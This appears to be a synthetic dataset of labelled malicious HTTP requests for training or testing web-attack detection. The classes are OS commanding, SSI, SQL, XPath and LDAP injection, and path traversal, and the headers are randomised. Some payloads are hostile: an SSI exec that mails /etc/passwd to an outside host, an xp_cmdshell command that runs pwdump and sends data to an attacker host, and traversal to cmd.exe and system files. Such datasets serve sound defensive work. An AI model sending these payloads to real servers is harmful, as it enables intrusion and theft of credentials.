User-Agent: Hnsitiw9zmn
UA-CPU: 68000
UA-Disp: 716,7145,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 0621x5666
Via: 3.2 www.6rlelaqr.htm:661
Transfer-Encoding: identity
Upgrade: hnegB/7.8, nnade/5.0, ony/9.4
Warning: 244 129.54.234.141 "tdkaRrieoeridtsfiy" 
X-Forwarded-For: 181.46.26.226
X-Serial-Number: 498357729
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38965
Start - Id: 43217
class: OsCommanding
GET /l7t6th6h/eTlGP4/RbgsoundCHrHUA7/saeabaex2fon/k3H296eCI25QT/mMBzH9olBopu/letkswoxy6tS5l60ie.html?4us3oaS=fa&tgir7nassgsAR=UswodltyxnteI&deo3wherevtveH=lT%40i&tumDsywtti=+%3B++echo+++%3B+w++%3B+++++uname+++++-a+++++%3B++++id&QZa@BR.VLbgsounds=fhdqhboot.ini&_AgetmppJkp_=2090916343&TgcLtFX=0nzN&b1BidcO4DQfrom0=ttFN&eesXistheT=eaiorpencoptl HTTP/1.1
Host: 174.144.65.148
Connection: close
Accept: image/*
Accept-Charset: x-mac-arabic;q=0.9, windows-874;q=0.9, euc-cn, x-mac-turkish
Accept-Encoding: *;q=0.4
Accept-Language: pi-ecr;q=0.7, j7lyougo-sst, uooa-8eey6oy;q=0.0, iidhLe-u;q=0.6, 5oari-gay;q=0.3
Cache-Control: no-transform
Client-ip: 59.228.253.1
Cookie: 6hdrae7I=4036153164;vmtt=rhl8l';cwWnwbEg=3
Cookie2: $Version="350"
Date: Tue, 14 Aug 07 15:31:12 GMT
ETag: W/"Dx8LFZguVMuaJIBl"
Expect: 100-continue
From: oaiin@sieotlre.cz
If-Modified-Since: Thu, 18 Sep 08 10:08:03 CET
If-Unmodified-Since: Wed, 27 Jan 10 09:11:49 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 31 Jul 09 14:00:06 CET
Max-Forwards: 702
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: mfey smnSW=fltvk
Authorization: ton5w eo0iw=9u8fi
Range: 2403-,12114-9,53-40810
Referer: /tezgmmt/lmdEdss/nnEoes7o.php
TE: deflate;q=0.3,gzip,trailers
Trailer: TE
User-Agent: of96Ago (ePZ47h; 3CoGd9rc2c; a@Q.Qn_Pq3)
UA-CPU: x86
UA-Disp: 1503,1276,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 476x125
Via: twm/1.6 www.auntsqe1.shtml
Transfer-Encoding: compress
Upgrade: pIh6l/8.2, tEst/3.2
Warning: 931 29.33.161.132:937 "tiriHq" "Sun, 23 Apr 06 11:58:11 UTC"
X-Forwarded-For: 33.3.87.207
X-Serial-Number: 3512760212193
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43217
Start - Id: 40129
class: SSI
GET /eT0QZy/ds5hhk8d5/ac@Qc/ooosEeleereeeroO2Ae8/o1K/U3BWg.jpg?9P0ht=ri0&bydbarlo=shcQAe8eo&Rwluisxsoenaq=46319&hje=m%40c&ta=e%28tOh%296rcpe%3BJ&_vB8=%3C%21--++%23exec+++cmd%3D%22%2Fbin%2Fmail+++i4Bl.com++++%3C+++%2Fetc%2Fpasswd%22--%3E&obtas=0e0eeegtocp HTTP/1.0
Host: 196.144.99.227
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.9, identity, deflate;q=0.2
Accept-Language: Txlg-m8hunoR;q=0.6
Cache-Control: no-transform
Client-ip: 5.35.157.119
Cookie: yICvmPvj-Sq=47
Date: Sun, 17 Aug 08 17:16:21 UTC
ETag: "4pxO4td__ZtpNlZm8MFK"
If-Modified-Since: Fri, 31 Oct 08 17:08:10 CET
If-Unmodified-Since: Tue, 12 Aug 08 18:58:28 UTC
Max-Forwards: 6155
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Basic b290UzpiY3R6
Authorization: 51Ar 5shchs=xydnaakN
Range: -7823
Referer: http://www.t6ot.org/5dmedac/wpirooco/eOi1leni/Mrnj.cgi
User-Agent: aamntndOalaeCLeltMn
UA-Color: color32
Transfer-Encoding: gzip
Warning: 305 53.141.60.13 "ymreiTeeg1dos2e" "Sun, 14 Oct 07 07:03:33 CET"
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40129
Start - Id: 48577
class: XPathInjection
PUT /JII5vshutdowns9gBn8glinkY/idruee8v3ehiu/UFxallM4O69_gB/oihla/e2g-RM/jnyihiQne/slb2b/t6EFxK/eIpaoqu/lQwUpXefdOdmoCZM/hsaA.VeaFQ@O/yd.htm? HTTP/1.0
Content-Length: 190
Content-Language: ccem6m
Content-Encoding: gzip
Content-Location: http://ldiltb.ch/anne/aBn8n0oi/oaraec/x7stEh.jsp
Content-MD5: ZVVwdWhyc25vbHNsYWVyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Jan 08 04:16:49 CET
Last-Modified: Mon, 12 May 08 13:24:56 CET
Host: 241.4.77.75:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.7
Accept-Language: sEeroto-ainZr, rrt-tzee, g5Pre-ps, li-ern34v7a;q=0.6
Cache-Control: no-store
Client-ip: 166.0.104.233
Cookie: tdhsn=372;Gswp-uxI=ecopy%where;gy1UXbqDkhavingaU=4
Cookie2: $Version="91"
Date: Sun, 13 Apr 08 11:09:18 GMT
ETag: W/"9_noTccKOGCA-qy"
Expect: iJvsn=ronjlII
From: Wdtimv@enchEetli.fr
If-Modified-Since: Thu, 19 Nov 09 06:23:42 GMT
If-Unmodified-Since: Sun, 15 May 05 19:01:21 GMT
If-Match: "EezgoY@xNeRCtugFgwNI"
If-None-Match: *
If-Range: Thu, 16 Oct 08 24:50:23 CET
Max-Forwards: 8566
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest qop=auth-int
Range: 89-706195
Referer: http://www.iaeNnD.uk/totirsod/tisneqa/6hgn0/to9el.php4
TE: deflate;q=0.1
Trailer: Date
User-Agent: Mozilla/7.3 (Windows; U; Windows NT 9.7; ac-rv; rv:9.9.9) Gecko/40284140
UA-CPU: StrongARM
UA-Disp: 488,4156,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 316x0903
Via: HTTP/4.0 www.iynhoepn.jpg, FTP/1.9 www.Tomtrjy.gif, HTTP/2.7 53.239.190.128:3965
Transfer-Encoding: identity
Upgrade: tht3/1.7, Wquod/3.6, gppbhH/7.6, oiu/0.5
Warning: 315 www.ao85sn.css "tafdeoll9t" 
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 63432598525498098
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

eAnzcsPn=2492&asbrii=(i    <     count(nhandr/child::text())  and    j  <  count(neg/child::comment())   and  k   <   count(Aaeet/child::*)  )

End - Id: 48577
Start - Id: 42586
class: SqlInjection
GET /@9G9CYfW@S/5HD.cgi?fDnUtHaid5rasih=OR++++%27Moone9ns%27++%3D+++++%27+++++%27 HTTP/1.0
Host: www.xoihoJsoi.ch:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: wau-oyegsgt, 8-o9gaiUh;q=0.0, titwij7-it, erdcA-ew;q=0.5
Cache-Control: max-age=52774
Client-ip: 77.66.60.82
Cookie: 8yowoeecbsthm=tV9frie;eiebnaaiubdhu=5;stu2saeqaeko=9235
Cookie2: $Version="502"
Date: Sun, 25 Apr 10 15:43:21 UTC
ETag: W/"ndcVEpE9UKtBcNm"
Expect: wshtlUla
From: tmTstilr@oerx.it
If-Modified-Since: Sun, 04 Apr 04 22:10:17 GMT
If-Unmodified-Since: Tue, 06 Oct 09 08:30:38 CET
If-Match: "X940-vBvQ9LT@e8h"
If-None-Match: *
If-Range: Tue, 26 Oct 04 06:49:16 GMT
Max-Forwards: 89
MIME-Version: 1.0
Pragma: 02so3=o
Proxy-Authorization: Basic Y2llZ2U6bml0aWQ=
Authorization: Digest realm
Range: -327,463619-533,09-501926
Referer: http://eetjWz.fr/itkE/meoomqlk/pElmeeh/hleaA/veedfl.exe
TE: chunked
Trailer: From
User-Agent: Mozilla/8.1 (Windows; U; Win98 7.1; pi-dr; rv:4.1.3) Gecko/65562467
UA-CPU: MIPS
UA-Disp: 8242,0192,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 4922x3138
Via: HTTP/0.3 www.5hrc.jpg, HTTP/9.8 130.173.125.146, 8.4 www.cwoefurv.tiff
Transfer-Encoding: identity
Upgrade: a3aitm/8.3, pebmu/7.7, atq/8.0
Warning: 740 www.flc6.js "aobefTi4oh6lxaa" "Sat, 01 Jul 06 04:47:36 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 7047593
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42586
Start - Id: 37173
class: LdapInjection
GET /aiHS9fhuAe/eeejFr0d.asp?Wun0ha8ia2ik=a+system%3D&ga1r9eed=3500932&ehe2ohTofsnbl=rz8raehn&ooaesdf=araaeeeelo&ounUmn4Wqi=et%287&ts=pei&l0ornefrraqwn=42&Fl0cnhNBhotmr=1092&qishblr=70980&ljUr=%29++++%28++%7C+%28s5nn%3Dtro*%29&3isofs7m=dsnplisatn&aeesoh9ybm2=h%2Fuee&3nIanI=h+ollniebzatiframeosa+&0StWtptgt4d=modWulTsr6da0 HTTP/1.0
Host: 47.174.82.175
Connection: keep-alive
Accept: */*
Accept-Charset: koi8-r;q=0.1, iso-8859-6;q=0.1, iso-8859-5
Accept-Encoding: identity;q=0.1, deflate;q=0.0, gzip, identity, gzip;q=0.3
Accept-Language: uzw-v;q=0.8, eNe-fe, 4enho-sei;q=0.3, rnsL2-lwi, etrcupus-LawrN
Cache-Control: enzAs='ieaad'
Client-ip: 188.238.110.194
Cookie: dNf5CwsamJr=49036;hm0r=d5wFf;_Ngzd04LtD=708727;aL6N=em?;aeReivf1iotdw9e=2245326;eiseaspvit=admin2o nu bmailtcr>ee-~rsg
Cookie2: $Version="45"
Date: Wed, 21 Mar 07 04:20:22 GMT
ETag: "cmhDI5J8iYPu8ZT-g7OW"
Expect: pooroeeh=nA3Te;syttsT
From: aheoexc5@cnna.gov
If-Modified-Since: Fri, 24 Jul 09 22:57:41 GMT
If-Unmodified-Since: Sat, 29 Oct 05 13:09:30 CET
If-Match: "gNHabTFCB4ceHSJ1f9c1"
If-None-Match: "WQ_-1Hx2FOdPcyy03L"
If-Range: "Z4G3T@eRECE7Qfy"
Max-Forwards: 77
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic YW90bmE6ZW16MnBhbg==
Authorization: Digest nonce
Range: 0-
Referer: /0dn9mbnn/egtb/7jhewohh.cfm
TE: deflate,trailers
Trailer: Via
User-Agent: Mozilla/9.9 (Machintosh; U; Mac OS X 0.3; it-ms; rv:1.1.4) Gecko/45221846
UA-CPU: StrongARM
UA-Disp: 303,353,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5776x2501
Via: 5.1 www.ne2sm9oh.html, 6.5 www.ngxis.htm, YOsv/2.9 www.htHA.htm
Transfer-Encoding: gzip
Upgrade: Tri/4.5
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 194.226.246.19
X-Serial-Number: 6743183535814854929
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37173
Start - Id: 38576
class: LdapInjection
GET /iframe0documentPwadmingroup byechoeval/1C/t3t0aeobthtUAtAidnQ/sN4ottseia/Steilexetja/cee/a00ZH1/nCianaOtdv2/txB90jIn6GMTwj_VwL.mspx?-EmSEdSvQPLp=e+bscripth&poleso=oBHHBQ&js=h6o2so&oMc9jtmt=io+on-&I1ZL=273&8cemwsOiiych=%29+%28+++%7C+++%28cn%3D*o%27brien*++%29%28mail++++%3D*o++++%27brien*+%29&tjiiheu9=encecnia+boot.inieyve&nuii=0350&ae8ucnssi=97&rottyihee0qh=krfndow8ri HTTP/1.0
Host: www.6bst.org
Connection: uh0Sso
Accept: application/*;q=0.4
Accept-Charset: cp-936, x-mac-roman, iso-8859-9, windows-1254;q=0.2, x-mac-hebrew
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.6
Cache-Control: j8ngia9Z='gea7isar'
Client-ip: 231.216.109.79
Cookie: ln=uIeodtcaoD1matee;ohttpopen4FXVCoptqboot.iniE=3284;UQtL4qPUUzo=5;2rYn=1n99steneayel;13ZpM=i4J;Hnce2ia2uti=nin
Cookie2: $Version="987"
Date: Sun, 05 Jun 05 16:35:19 GMT
ETag: W/"INs.rY_u52VqhZ3fN"
Expect: UpT3s
From: sntdhp@rvsirrEwfi.it
If-Modified-Since: Sun, 19 Dec 04 10:41:41 UTC
If-Unmodified-Since: Sat, 03 Apr 10 02:00:47 UTC
If-Match: "dilbic2rBdLeSeaM"
If-None-Match: *
If-Range: *
Max-Forwards: 88
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic YXRkdzJsSXI6ejJ0Zmlp
Authorization: Basic MW9pb3VJbTppc2F5YXBl
Range: -5
Referer: http://meolmac.uk/r9ozth.dll
TE: trailers,chunked;q=0.1
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.3 (compatible; Konqueror/1.9; Win 9x; enuixcq; estgbts)
UA-CPU: PowerPC
UA-Disp: 9162,3647,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 639x8095
Via: FTP/1.2 153.237.119.41
Transfer-Encoding: compress
Upgrade: ksu/7.2, ear/3.1
Warning: 767 180.228.227.71 "tniR" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 0288802054604644545
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38576
Start - Id: 49383
class: XPathInjection
GET /zhR/nC.L/g0/ejfkAD@Wm7@@v7.J.php3?r2odioDamau=d%2FyM%2FasrcI%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D3%5D+++++or+%27wriN%27++++%3D%27&xtritaoaaa=ls%28e HTTP/1.1
Host: 19.186.217.14
Connection: close
Accept: application/zip, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 227.191.80.33
Cookie: ll0olol4=ths
Cookie2: $Version="66"
Date: Sun, 10 Sep 06 07:30:23 CET
ETag: W/"BQ8qcs5LUF@poCI-A3p"
Expect: e9are=3ga6;rreedh=exVa6
From: pail@dkPluia.de
If-Modified-Since: Sun, 20 Jan 08 19:44:22 GMT
If-Unmodified-Since: Tue, 14 Mar 06 14:43:31 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 270
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: gWoe no1msa3=apmn
Authorization: nae8oa ufesao=bnthuhs
Range: 6-,-18019
Referer: /ewethrIl.mdb
TE: chunked
Trailer: Pragma
User-Agent: tfnktdltLq (2Kpjlolb; fZF@@oJN6D; gNAqcHwHK4; yvMgyXR3I_)
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0695x2392
Via: FTP/5.0 www.og9nrsr.gif
Transfer-Encoding: deflate
Upgrade: peor/1.1, d2rrnr/4.2
Warning: 873 179.220.247.176 "a53nepbizi" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49383
Start - Id: 35854
class: XPathInjection
GET /Tnaiugrthed/ehOHBUra/xslcuiehfnqk/KowK1sdEb8omsx8svrf/r-rn7C3VVB/8PF@xB/c14V-dDRzIlpCgiZJv/ean4lan69tojoasgo8/dh8samitbesot.png?-tvMUimguQDR=l7nph-noshnf%3Ftglce&coeusxe6qo=sfew2Cku5T&eoataeeRbSNwK=tmpbct4&i8zettQsn3yo=toemet&edsg=t9tsciraigWcnk&sftidn6f3=7393&Eis=l+jt&eig=loTm3isuentek+hm&dtriDsn=7812+++or+ty%2Fh%2FT%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D53%5D+++++or++1%3D&a4rragsm=6mHl%7EpasswdhnDScea%5Bnu&Rensq5=teeYmy&RAXRf.eslg5=3228860 HTTP/1.1
Host: www.zwreveinw.it
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-roman, koi8-r, utf-8;q=0.5, windows-1258, us-ascii;q=0.8
Accept-Encoding: 
Accept-Language: mopea-dt, tgbh-7mea;q=0.6, ou-re7rthc;q=0.3, 6iettfe-N7ttr;q=0.1
Cache-Control: 0toot='srcns1t'
Client-ip: 166.9.40.74
Cookie: gajha6ot=7rt|v;O9y7whQe=3038;htnhpt3i=tTJy7mJ3;dDh7tcssnji=jdDhu242yT;ae5wcscom=as;2HZwhere5divK20=nDLcSC3
Cookie2: $Version="1"
Date: Wed, 24 Jun 09 21:43:26 UTC
ETag: "bhOsZQ9I08QZQJM3GB.5"
Expect: 100-continue
From: dtisuok@sicpmn.gov
If-Modified-Since: Mon, 19 Oct 09 08:26:54 GMT
If-Unmodified-Since: Fri, 21 Dec 07 24:33:04 CET
If-Match: "75ogcdEg1tIwP2ZdWlK7"
If-None-Match: *
If-Range: "i5r.5H0aAAf-6ivyEc"
Max-Forwards: 55
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic MGFnc01zaWk6cDlzaW4=
Authorization: Basic aXNuZXN1bG86aElpY25PZmk=
Range: -15
Referer: /crbor.pl
TE: trailers
Trailer: Range
User-Agent: ffanp (4HKvfCStQ)
UA-CPU: PowerPC
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4135x5853
Via: HTTP/5.6 www.tct9dpg.gif
Transfer-Encoding: identity
Upgrade: ei2y/3.0
Warning: 610 www.24teifwn.png "Opivct0gaEd" 
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 83889853145892267537
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35854
Start - Id: 45416
class: PathTransversal
POST /yVyPKLEEyApavI/shtUsDpS/ses/bAfuJ5yO/n2Qqsw@00l/tZx3PPp_Ro.gif? HTTP/1.0
Content-Length: 388
Content-Language: uheniRti,krg,p
Content-Encoding: gzip
Content-Location: /gaieaix/y6twob/h8O0sfhi/i18a4.jpeg
Content-MD5: cHR1aW5yOG1mYnIxdHlhZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 11 Dec 08 07:00:28 CET
Last-Modified: Sat, 17 Mar 07 03:53:15 CET
Host: www.lbqEt.org
Connection: wdDk9
Accept: video/quicktime, image/gif, image/*;q=0.3
Accept-Charset: *
Accept-Encoding: gzip, compress, deflate, identity, deflate
Accept-Language: n-1mfg6;q=0.2, r-FhzGwcnk;q=0.7, 4-3svy;q=0.1
Cache-Control: no-store
Client-ip: 147.195.122.195
Cookie: swhhlsoanolc=xtermeewget3tq%e;ssylqlrotsiu=253816321;eedkwn7nfci=5301;positionrNJd= h
Cookie2: $Version="4"
Date: Wed, 11 Oct 06 01:49:24 GMT
ETag: "6zBxCy6m7hhCDZBV"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Sat, 14 Feb 04 18:46:27 CET
If-Unmodified-Since: Mon, 15 Mar 04 19:59:38 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 16 Dec 06 24:14:16 GMT
Max-Forwards: 66
MIME-Version: 3.3
Pragma: lk='aog'
Proxy-Authorization: eOpgl ldhoil=meunte
Authorization: Digest username="ps6nrs"
Range: -292636,082693-
Referer: /ulsncn/iref7tx/5rnqmeet.doc
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: sCuSywFKZ http://www.aibs.org
UA-CPU: PowerPC
UA-Disp: 193,273,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 863x2272
Via: 8.3 www.erlB.tiff, 1.1 www.w9zb5.htm, adieR/8.3 www.enrnC.js:23
Transfer-Encoding: gzip
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 226 191.247.153.35 "oywrpbp" "Tue, 07 Jun 05 04:43:35 GMT"
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 7007774658100
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

loln4z= hO&cc8z83ecseo3aco=/../../../../Inetpub/iissamples/cheletlien/riornale/atsiitrean/ololenne.bin&reI=telnetnhei&14ctxmY=e&AesheFa=?Hdnplsystemv&mm|eh/q@u&sbwppaiwnrwnhoH=yleni&rIbefpo=h&Kb0bincf=ku&Ivvh9srytde=einsert%sene2netcateoEecea&eybhoduEiTl=9321037&geEtbteee3mqe=nullGt+ ued|=tmprs7kl&u9accepto1Ga=072348&.W3Fd8dservicesOC=rt&tY1B4_=431

End - Id: 45416
Start - Id: 45414
class: PathTransversal
POST /oi.cgi? HTTP/1.1
Content-Length: 115
Content-Language: tbnw,aemog,olA9i0
Content-Encoding: compress
Content-Location: /h3n9itfn/mdepsa/essio/tceiyk.tar
Content-MD5: eWF0U3VSc2V1dGlhbXRobw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 Mar 08 24:09:24 UTC
Last-Modified: Fri, 28 Mar 08 10:03:27 UTC
Host: 126.181.152.154:80
Connection: close
Accept: image/gif, image/jpeg
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 147.195.122.195
Cookie: swhhlsoanolc=xtermeewget3tq%e;ssylqlrotsiu=253816321;eedkwn7nfci=5301;positionrNJd= h
Cookie2: $Version="133"
Date: Tue, 31 May 05 14:45:06 CET
ETag: W/"-RB0JpWdFTdAI3JiPZ"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Sat, 14 Feb 04 18:46:27 CET
If-Unmodified-Since: Sun, 19 Apr 09 13:57:57 GMT
If-Match: *
If-None-Match: "ZyM0YzM6F1Vm2sLWX@Z"
If-Range: Sat, 16 Dec 06 24:14:16 GMT
Max-Forwards: 66
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: eOpgl ldhoil=meunte
Authorization: Digest username="ps6nrs"
Range: -292636,082693-
Referer: http://tLba2.gov/grai3/eTmeGter/L8fbda/aeb9En7.tiff
TE: deflate,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.7 (Windows; U; Win98 8.6; nf-bo; rv:2.7.2) Gecko/18953127
UA-CPU: PowerPC
UA-Disp: 193,273,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 863x2272
Via: 4.3 www.lieir.js:2558, 1.1 201.241.148.50:59
Transfer-Encoding: gzip
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 226 191.247.153.35 "oywrpbp" "Tue, 07 Jun 05 04:43:35 GMT"
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 7007774658100
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aR8nyeydf=5heO&auyde3o8A=0850119&si=qtsa&oKdter=uy2-FFi&swD=../../../WINNT/autoexec.bat&ctconpoistWaNos=491

End - Id: 45414
Start - Id: 41123
class: SqlInjection
GET /e8ixyl4li/z0siinuhsematvrd/bsztai/motdr.exe?elosnohnrenmh0o=tAtWm&ieis=jryfnnhlpe11Lpi&ps_Uyr-kg9a=307&emdbtW=hG%24r&ttsmuofnhugs=u%3DrN%5C&tbg=aeakyonCs&7h7alrweat7F=r&ao=36&lkhrmtoot=eu&Maccess_logx38=t%3Dmocha%29&3wet7spw=exec++++xp_cmdshell++%27bcp++%22select++++*+++++from+++++lp4ed5cme%22+++++queryout+++pwdump.exe++++-c+++-Craw+++-Shackersip++-Usa+++++-Ph8ck3r%27&Hinht7tiseNrz8w=jo%5Dlndea&WiIFyrov=040&9Moiadsasniem=8892607&hae=%3C47- HTTP/1.0
Host: www.inj0h.biz:80
Connection: eeEs
Accept: */*;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: EtIei-ws2eaih;q=0.0, tstwdDy-no1ne2ua;q=0.6, y-ctpob;q=0.6, dec1-czehom;q=0.3, eec8-tenpksr;q=0.1
Cache-Control: max-stale
Client-ip: 104.85.29.24
Cookie: hz=hzuoezu0;allEoP=elsah70nO3oownean;9OM5_fG=tFtwC_;Qxre4riajli=oB5.;aw8a=800412;oiokn1ebsnaAi0e=eEG
Cookie2: $Version="3"
Date: Mon, 01 Jun 09 11:00:46 CET
ETag: W/"2aTlPu50dA@UKfxeZq"
If-Modified-Since: Wed, 12 Mar 08 05:51:48 GMT
If-Unmodified-Since: Fri, 19 Sep 08 09:24:47 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 16
Pragma: oz2s='ltryu'
Authorization: NTLM U2V1YmptdG1wZWVlaWVjU2FvcjYzY3R5YWVhMWYwdGk4NmN0eQ==
Referer: /ac7tee/vbettb/iswof.avi
User-Agent: t-cm7iIU http://www.1fgeg.be
UA-CPU: 68000
UA-Disp: 106,924,16
Transfer-Encoding: io9f; twi4h=rem2lw
Warning: 894 www.t2teem.tiff:4 "hItafp" 
X-Forwarded-For: 155.33.177.149
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41123
Start - Id: 48460
class: XPathInjection
GET /f7vNw2subygIj9/0p2pVFIeEPCbFmW2BM2.nsf?eac27nevucofrt=1496 HTTP/1.1
Host: www.oeoenni.org
Connection: njr4
Accept: application/*
Accept-Charset: windows-1257;q=0.7, x-mac-roman, x-mac-chinesetrad, cp-932;q=0.2
Accept-Encoding: gzip;q=0.3, compress, deflate;q=0.7, deflate
Accept-Language: *
Cache-Control: min-fresh=25
Client-ip: 5.30.115.138
Cookie: uxo6ern7c88u=5  or     1hon/s3ieL/hhe2/child::node()[position()=111]   or  8698=;nxoqw6la=9133342;easssAetfl1=92;iLfM-0OdocumentB-B=8
Cookie2: $Version="7"
Date: Sun, 22 May 05 12:02:26 UTC
ETag: "VaD9kGWv0ENohkXhy"
Expect: 100-continue
From: wiejsa@Npeno.uk
If-Modified-Since: Fri, 06 Apr 07 11:49:08 GMT
If-Unmodified-Since: Wed, 05 Oct 05 12:25:54 CET
If-Match: "wdEg56T2dFd@CgWn9"
If-None-Match: *
If-Range: Tue, 27 May 08 04:51:42 CET
Max-Forwards: 9
MIME-Version: 4.7
Pragma: reagRtfe=reads
Proxy-Authorization: NTLM ZHplNHFveWk1T3BFbW56ZW5zd2ZlaHJyY2l0dW1VYXRlbW9henMzMGRhUmVoYXNz
Authorization: Digest opaque="naeay"
Range: -4857,-4061,8-529315
Referer: /lanAerdl.swf
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: erHg/9.1.2.3.1
UA-CPU: PowerPC
UA-Disp: 746,1547,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1568x1912
Via: HTTP/1.0 www.eebel.js, FTP/2.8 253.13.171.17
Transfer-Encoding: deflate
Upgrade: nnn/0.7, rrk/3.0, eFiou/2.4, To4yt/2.6
Warning: 776 232.210.70.64:9838 "sOs0susNndlssbkeaeh" "Mon, 26 Mar 07 07:02:44 GMT"
X-Forwarded-For: 3.118.59.198
X-Serial-Number: 881741666326313
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48460
Start - Id: 36577
class: OsCommanding
GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.cnetsnazT.net
Connection: close
Accept: text/xml;q=0.6
Accept-Charset: cp-950;q=0.1, windows-1252
Accept-Encoding: identity, deflate
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 216.64.166.207
Cookie: Srqi4rLgu5ioR2t=reszt;Xo7Tn=4;y_j02OlW=8121813970;iei=doSlo;.22N=33355157
Cookie2: $Version="543"
Date: Wed, 23 May 07 15:42:06 CET
ETag: "KAH1MryK8eDOI3dzdV"
Expect: eAdl7
From: osNAoh@aHn2nry.de
If-Modified-Since: Mon, 19 Dec 05 21:26:19 UTC
If-Unmodified-Since: Wed, 27 Jul 05 08:36:41 UTC
If-Match: *
If-None-Match: *
If-Range: "4JPZ-PcrArb1Gzp0jqi"
Max-Forwards: 085
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic ZXdoY3A6Um5sc3I=
Range: 599-
Referer: /8ocdt/neElMO.php4
TE: trailers,deflate
Trailer: If-Match
User-Agent: Mozilla/8.7 (Machintosh; U; PPC 5.3; dt-de; rv:9.3.4) Gecko/22113518
UA-CPU: Sparc
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 186x739
Via: HTTP/0.0 www.aredjrc.tiff, 8.2 www.bxed.png, FTP/9.6 www.atenwi.png:5394
Transfer-Encoding: gzip
Upgrade: t2w5X/9.8
Warning: 791 150.111.227.182 "ltte" 
X-Forwarded-For: 50.37.241.255
X-Serial-Number: 674486890515415
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36577
Start - Id: 48816
class: XPathInjection
